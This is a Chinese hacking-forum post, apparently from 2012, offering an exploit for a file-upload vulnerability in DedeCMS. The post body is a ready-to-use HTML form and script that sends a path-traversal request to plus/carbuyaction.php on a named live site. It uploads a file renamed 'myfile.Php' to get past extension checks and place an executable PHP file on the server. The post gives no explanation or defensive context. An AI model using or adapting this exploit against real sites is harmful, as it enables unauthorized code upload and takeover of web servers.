找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2409|回复: 0
打印 上一主题 下一主题

dedecms注册用户上传漏洞利用exp

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-19 08:36:43 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
<form action="" method="post" enctype="multipart/form-data" name="QuickSearch" id="QuickSearch" onsubmit="addaction();"> <input type="text" value="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" name="doaction" style="width:800"><br /> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <input type="submit" value="提交" name="QuickSearchBtn"><br /> </form> <script> function addaction() { document.QuickSearch.action=document.QuickSearch.doaction.value; } </script>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表